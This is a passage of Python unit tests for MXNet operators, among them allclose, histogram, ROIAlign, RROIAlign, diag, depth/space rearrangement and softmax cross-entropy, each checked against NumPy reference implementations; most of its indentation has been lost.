for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
                    # Report the elements of the array that this context considers "not close",
                    # together with the corresponding CPU/GPU/Python values that are considered "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
                    # Collect the indices of all violations and the corresponding values
                    bad_indexes = np.abs(a_b - b_b) >= atol + rtol * np.abs(b_b)
                    a_values = [a_b[bad_indexes], a_g[bad_indexes]]
                    b_values = [b_b[bad_indexes], b_g[bad_indexes]]
                    idx = np.asarray(np.where(bad_indexes))
                    idx_flat = np.asarray(np.where(bad_indexes.flatten())).flatten()
                    for i in range(len(a_values[0])):
                        flat_idx = idx_flat[i]
                        print('{}: index = {} flat_index = {}'.format('%4d' % i, idx[:, i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@with_seed()
def test_allclose_function():
allclose_function([default_context()])
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
    if is_windows:
        # Windows doesn't support setting environment variables on the fly, so disable this for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
    if is_windows:
        # Windows doesn't support setting environment variables on the fly, so disable this for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
length = mx.sym.Variable("length", shape=(10, 10, 10))
sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
@with_seed()
@unittest.skip("Test fails intermittently; temporarily disabled until it gets fixed. Tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
def test_ravel():
    # Be aware that check_symbolic_forward uses float internally for the
    # arrays, which limits the representable flat-index range. Taking dim==4
    # and a data range of [0, ..., 100] can already cause precision issues
    # and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_context_num_gpus():
try:
        # Note: the test runs on both GPU and CPU hosts, so we cannot assert
        # a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
        # Note: on a CPU-only host, CUDA sometimes cannot determine the number
        # of GPUs.
if str(e).find("CUDA") == -1:
raise e
@with_seed()
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same.
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same.
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
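    # The sampling grid above is rotated by the ROI angle around the box centre
    # ((xx, yy) -> (x, y)) before bilinear sampling, which is what distinguishes
    # RROIAlign from the axis-aligned ROIAlign.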
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
    # Test 1d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
    # k = -1, axis1=1, axis2=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
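    # np.diagonal on a 4-D array drops the two selected axes and appends the
    # diagonal as a new trailing axis, so each result above is 3-D.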
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
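    # For reference: depth_to_space with block=2 maps shape (n, 4*k, h, w) to
    # (n, k, 2*h, 2*w); f() above is the NumPy reference for that rearrangement.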
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
        invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
        invalid_shape_inp = (n, c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
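# Hedged worked example (illustrative only): with a one-hot label, the reference
# loss f_sm_ce above reduces to -log(softmax(logits))[true_class], summed over rows.
def _softmax_ce_example():
    import numpy as np
    logits = np.array([[1.0, 2.0, 3.0]])
    probs = np.exp(logits) / np.exp(logits).sum(axis=1, keepdims=True)
    one_hot = np.array([[0.0, 0.0, 1.0]])
    loss = np.sum(-np.log(probs) * one_hot)
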